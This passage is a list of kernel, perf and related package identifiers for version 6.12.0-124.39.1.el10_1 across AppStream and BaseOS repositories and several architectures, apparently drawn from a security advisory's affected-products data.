"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
